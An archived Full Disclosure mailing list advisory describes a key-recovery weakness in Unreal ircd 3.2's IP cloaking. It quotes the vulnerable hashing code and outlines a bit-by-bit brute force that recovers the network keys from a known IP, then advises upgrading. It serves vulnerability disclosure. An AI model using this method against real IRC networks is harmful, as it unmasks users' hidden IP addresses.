Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Unreal ircd 3.2 clocking subsystem vulnerability
From: bartavelle <bartavelle-anti-spam-thingie () banquise net>
Date: Mon, 05 Jul 2004 14:23:55 +0200

Software name:          Unreal ircd
Vulnerable versions:    3.2 and probably previous versions
Problem nature:         Information disclosure

Unreal ircd is a popular irc server. One of the features it provides is
called 'ip cloaking'. The purpose of this system is to prevent hostile
irc users from getting the IP address of other users.

In order to prevent ip bruteforcing, it uses three 'keys'. However, the
hashing system is weak.

It is possible to recover the keys of several irc networks by knowing
only one clear text and hashed IP, and another hashed IP.

The IPv4 hashing scheme is the most vulnerable. Code from cloak.c

/* Do IPv4 cloaking here */
strlcpy(h1, host, sizeof h1);
i = 0;
for (i = 0, p = strtok(h1, "."); p && (i <= 3); p = strtok(NULL, "."), i++)
        strncpy(h2[i], p, 4);
ircsprintf(h3, "%s.%s", h2[0], h2[1]);
l[0] = ((our_crc32(h3, strlen(h3)) + KEY) ^ KEY2) + KEY3;
ircsprintf(h3, "%s.%s.%s", h2[0], h2[1], h2[2]);
l[1] = ((KEY2 ^ our_crc32(h3, strlen(h3))) + KEY3) ^ KEY;
l[4] = our_crc32(host, strlen(host));
l[2] = ((l[4] + KEY3) ^ KEY) + KEY2;
l[2] &= 0x3FFFFFFF;
l[0] &= 0x7FFFFFFF;
l[1] &= 0xFFFFFFFF;
snprintf(cloaked, sizeof cloaked, "%lX.%lX.%lX.IP", l[2], l[1], l[0]);
return cloaked;

h2[0], h2[1], h2[2], h2[3] contain the four bytes of the original IP.
l[0], l[1], l[2] contain the hashed IP. Thus:

l[0] = (((crc32("1.2") + key1) ^ key2) + key3) & 0x7FFFFFFF;
l[1] = (((crc32("1.2.3") ^ key2) + key3) ^ key1) & 0xFFFFFFFF;
l[2] = (((crc32("") + key3) ^ key1) + key2) & 0x3FFFFFFF;

crc32(xxx) and l[x] are is known. The three keys are used in such a way
that the n-th bit of any key does not affect bits bellow n in the hash.

We have successfully writen a program that bruteforces one bit at a
time. It takes less than one second to do that on a pentium4 1.8ghz.

Doing this on a known IP produces around 2000 possible key
combinations. It is then trivial to test them all in order to find the
working ones.

Update to version 3.2.1

Up to date information:

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
  • Unreal ircd 3.2 clocking subsystem vulnerability bartavelle (Jul 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]